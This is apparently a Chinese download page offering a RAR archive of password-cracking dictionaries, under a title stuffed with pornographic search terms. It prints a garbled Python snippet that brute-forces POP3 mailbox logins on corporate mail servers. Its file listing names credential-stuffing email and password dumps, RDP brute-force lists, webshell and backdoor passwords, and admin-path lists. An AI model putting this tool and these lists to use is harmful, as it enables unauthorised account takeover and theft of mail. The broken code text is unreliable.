91av视频/亚洲h视频/操亚洲美女/外国一级黄色毛片 - 国产三级三级三级三级

  • 大小: 37.4MB
    文件類型: .rar
    金幣: 2
    下載: 0 次
    發布日期: 2024-01-29
  • 語言: 其他
  • 標簽: 密碼??破解??字典??

資源簡介

密碼字典,是配合密碼破譯軟件所使用的。密碼字典里包括許多人們習慣性設置的密碼,這樣可以提高密碼破譯軟件的密碼破譯成功率和命中率,縮短密碼破譯的時間。 如果一個人密碼設置沒有規律或很復雜,未包含在密碼字典里,這個字典就沒有用了,甚至會延長密碼破譯所需要的時間。

資源截圖

代碼片段和文件信息

#!usr/bin/python?
#!coding:utf-8?

import?threadingtimerandomsyspoplib?
from?copy?import?copy?

if?len(sys.argv)?!=4:?
????print?“\t????Note:?郵箱類型為:‘163‘‘tencent‘‘coremail‘‘236‘‘exchange‘?\n“?
????print?“\t????Note:?coremail|exchange?用戶字典不需要域名后綴,例如zhangsan\n“?
????print?“\t????Note:?163|tencent|236?用戶字典需要域名后綴,例如zhangsan@domain.com\n“?
????print?“\t????Usage:?163|tencent使用方法:./mail.py?type??\n“?
????print?“\t????Usage:?236|exchange|coremail使用方法:./mail.py?type???mail.domain.com\n“???

????sys.exit(1)?

mailType=[‘163‘‘tencent‘‘coremail‘‘236‘‘exchange‘]?

if?sys.argv[1]?in?[‘236‘‘exchange‘‘coremail‘]:?
????try:?
????????server?=?sys.argv[5]?
????except:?
????????print?‘[-]?Error:?236|exchange|coremail需要指定domain.com,請參考使用說明!\n‘?
????????sys.exit(1)?
elif?sys.argv[1]?==?‘163‘:?
????server?=?“pop.qiye.163.com“?
elif?sys.argv[1]?==?‘tencent‘:?
????server?=?“pop.exmail.qq.com“?
else?:?
????print?“[-]?Error:?郵箱類型錯誤\n“?
????sys.exit(1)?
?????
success?=?[]?

try:?
????users_list?=?open(sys.argv[2]?“r“)?
????users?=?users_list.readlines()?
????words_list?=?open(sys.argv[3]?“r“)?
????words?=?words_list.readlines()?
except(IOError):?
????print?“[-]?Error:?請檢查用戶名或密碼路徑及文件\n“?
????sys.exit(1)?
finally:?
????users_list.close()?
????words_list.close()?
?????
try:?
????if?sys.argv[1]?in?[‘163‘‘236‘]:?
????????pop?=?poplib.POP3(server110)?????????
????else:?
????????pop?=?poplib.POP3_SSL(server995)?
????welcome?=?pop.getwelcome()?
????print?welcome?
????pop.quit()?
except?(poplib.error_proto):?
????welcome?=?“[-]?Error:?No?ResponseSomething?wrong!!!\n“?
????sys.exit(1)?

print?“[+]?Server:“server?
print?“[+]?Users?Loaded:“len(users)?
print?“[+]?Words?Loaded:“len(words)?
print?“[+]?Server?response:“welcome“\n“?

def?mailbruteforce(listuserlistpwdtype):?
????if?len(listuser)?????????print?“[-]?Error:?An?error?occurred:?No?user?or?pass?list\n“?
????????return?1?
?????
????for?user?in?listuser:?
????????for?passwd?in?listpwd?:?
????????????user?=?user.replace(“\n“““)?
????????????passwd?=?passwd.replace(“\n“““)?
?????????????
????????????try:?
????????????????print?“-“*12?
????????????????print?“[+]?User:“user“Password:“passwd?
?????????????????
#?????????????????time.sleep(0.1)???????
????????????????if?type?in?[‘163‘‘236‘]:?
????????????????????popserver?=?poplib.POP3(server110)?????????
????????????????else:?
????????????????????popserver?=?poplib.POP3_SSL(server995)?
????????????????popserver.user(user)?
????????????????auth?=?popserver.pass_(passwd)?
????????????????print?auth?
?????????????????
????????????????if?auth.split(‘?‘)[0]?==?“+OK“?or?auth?==“+OK“:?
????????????????????ret?=?(userpasswdpopserver.stat()[0]popserver.stat()[1])?
????????????????????success.append(ret)?
????????????????????#print?len(success)?
????????????????????popserver.quit()?
????????????????????break?
????????????????else?:?
????????????????????popserver.quit()?
????????????????????co

?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----

?????文件?????264315??2010-06-18?05:57??密碼字典\400W常用密碼\1pass00.txt

?????文件????2421264??2010-06-09?01:06??密碼字典\400W常用密碼\1pass01.txt

?????文件???10522374??2010-06-18?07:06??密碼字典\400W常用密碼\1pass02.txt

?????文件???13723599??2010-01-22?01:26??密碼字典\400W常用密碼\1pass03.txt

?????文件??????86258??2018-03-15?13:13??密碼字典\top10000.txt

?????文件????9556869??2018-03-15?13:13??密碼字典\top3000.txt

????.......??????2344??2017-11-15?15:30??密碼字典\各類字典\3389爆破字典.txt

????.......??????3637??2017-11-15?15:30??密碼字典\各類字典\baopo.py

????.......????????54??2017-11-15?15:30??密碼字典\各類字典\big_dictionary.txt

????.......???????500??2017-11-15?15:30??密碼字典\各類字典\jiahouzhui.py

????.......?????18284??2017-11-15?15:30??密碼字典\各類字典\liunx_users_dictionaries.txt

????.......??????5176??2017-11-15?15:30??密碼字典\各類字典\NT密碼.txt

????.......????????35??2017-11-15?15:30??密碼字典\各類字典\README.md

????.......??????8846??2017-11-15?15:30??密碼字典\各類字典\renkoutop.txt

????.......??????1015??2017-11-15?15:30??密碼字典\各類字典\top100password.txt

????.......???9273839??2017-11-15?15:30??密碼字典\各類字典\top10W.txt

????.......?????22534??2017-11-15?15:30??密碼字典\各類字典\top500姓名組合.txt

????.......???????134??2017-11-15?15:30??密碼字典\各類字典\weblogic默認密碼列表.txt

????.......????144194??2017-11-15?15:30??密碼字典\各類字典\webshellPassword.txt

????.......?????12865??2017-11-15?15:30??密碼字典\各類字典\各類黑客大牛后門密碼\各類黑客大牛后門密碼.txt

????.......?????40710??2017-11-15?15:30??密碼字典\各類字典\后臺路徑.txt

????.......??????2107??2017-11-15?15:30??密碼字典\各類字典\字典.txt

????.......?????62027??2017-11-15?15:30??密碼字典\各類字典\常用密碼.txt

????.......?????71357??2017-11-15?15:30??密碼字典\各類字典\常用用戶名.txt

????.......????700728??2017-11-15?15:30??密碼字典\各類字典\常用英文用戶名和奇葩密碼\passwords.txt

????.......????139344??2017-11-15?15:30??密碼字典\各類字典\常用英文用戶名和奇葩密碼\usernames.txt

????.......???6683196??2017-11-15?15:30??密碼字典\各類字典\撞庫郵箱和密碼\mail.txt

????.......???3363897??2017-11-15?15:30??密碼字典\各類字典\撞庫郵箱和密碼\passwd.txt

????.......?????10197??2017-11-15?15:30??密碼字典\各類字典\數據庫地址.txt

????.......????174888??2017-11-15?15:30??密碼字典\各類字典\滲透字典.txt

............此處省略123個文件信息

評論

共有 條評論